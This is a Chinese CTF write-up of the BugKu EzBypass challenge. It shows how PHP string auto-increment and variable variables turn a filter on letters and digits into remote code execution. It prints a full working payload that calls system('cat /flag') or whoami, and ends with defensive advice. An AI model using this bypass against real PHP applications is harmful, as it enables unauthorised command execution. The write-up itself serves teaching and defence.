PHP代码审计新思路：不用字母数字，如何用‘自增’字符串构造RCE（BugKu EzBypass实战）

PHP代码审计中的字符魔术：从特殊符号到完整RCE的奇幻之旅

在CTF竞赛和真实渗透测试中，我们常常会遇到各种严格的字符过滤机制。想象这样一个场景：你面对的PHP代码只允许使用下划线、点号和逗号等极少数特殊字符，所有字母、数字和常见符号都被preg_match无情过滤。这就像被关在一个字符监狱里，手中只有几把生锈的钥匙——但正是这种极端限制，往往能激发出最精妙的绕过技巧。

1. 理解挑战的本质：字符监狱的围墙

首先我们需要清楚题目设置的过滤规则。查看源代码中的正则表达式：

if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<?>\"|`~\\\\]/",$code)){ eval($code); }

这个正则表达式几乎过滤了所有可见的危险字符，只留下极少数"安全"字符。通过简单的字符测试脚本：

for ($i=32;$i<127;$i++){ if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<?>\"|`~\\\\]/",chr($i))){ echo chr($i); } }

我们可以确认允许使用的字符主要包括：$ ()[]=;+.,/_。这就像在玩一个字符版的拼图游戏——我们需要用这些有限的"拼图块"组合出完整的函数调用。

2. PHP的字符串自增特性：从下划线到字母表

PHP有一个鲜为人知但极其强大的特性：字符串自增。与数字自增类似，字符串也可以通过++操作符进行"递增"：

$_ = 'a'; $_++; // $_现在是'b'

但更有趣的是，这个特性对特殊字符同样有效。让我们从下划线_开始：

$_ = '_'; $_++; // $_现在变成'a'

这个特性为我们打开了一扇大门——可以从允许的特殊字符"孵化"出被过滤的字母。以下是关键步骤的演进：

1. 初始字符获取：$_=(_/_._)[_];

   • (_/_._)生成字符串"NAN"（因为0/0等于NAN）
   • [_]取第一个字符"N"（因为_被当作字符串时会转换为0）

2. 逐步自增构建"POST"：

   $_++; // "O" $__=$_.$_++; // "PO"（注意这里用了后置++） $_++;$_++; // "Q"变成"R"再变成"S" $__=$__.$_; // "POS" $_++; // "T" $__=$__.$_; // "POST"

3. 构造$_POST变量：

   $_=_.$__; // "_POST"

3. 完整RCE链条的组装

有了$_POST这个关键变量，我们就可以通过变量变量（variable variables）来执行任意函数了：

$$_[_]($$_[__]); // 等价于 $_POST['_']($_POST['__']) // 如果传入 _=system&__=whoami，则变成 system('whoami')

最终的payload需要将所有这些步骤用允许的字符连接起来：

code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=cat /flag

4. 实战中的注意事项与技巧

在实际应用这种技术时，有几个关键点需要注意：

PHP版本差异：

• 该技巧在PHP 7.0+上稳定工作
• PHP 5.x版本可能会有不同的字符串处理行为
• 本地测试时建议使用Docker快速切换版本：

  docker run -it --rm php:7.4-cli php -r '$_="N";$_++;echo $_;'

调试技巧：

1. 分阶段验证：每构建一个字符就输出检查
2. 使用var_dump观察中间结果：

   $_=(_/_._)[_]; var_dump($_); $_++; var_dump($_);

3. 从简单开始：先构建system，再尝试更复杂的函数链

Payload优化：

• 最小化字符使用：移除不必要的分号
• 考虑使用更短的初始字符路径
• 探索其他未被过滤的字符组合可能性

5. 防御思路与安全启示

站在防御者角度，如何防止这种精妙的绕过？

1. 白名单优于黑名单：

   • 定义允许的字符集而不是禁止的
   • 例如只允许特定的无害字符

2. 禁用危险函数：

   disable_functions = exec,passthru,shell_exec,system

3. 输入内容限制：

   • 限制输入长度
   • 禁止多重变量解析

4. 使用沙盒环境：

   • 在隔离环境中执行不可信代码
   • 设置严格的资源限制

这种绕过技术展示了安全领域一个永恒真理：过滤机制的安全性取决于它最薄弱的环节。当开发者认为"已经过滤了所有危险字符"时，攻击者总能找到意想不到的组合方式。这也是为什么安全专家总是强调深度防御——没有单一的银弹能解决所有安全问题。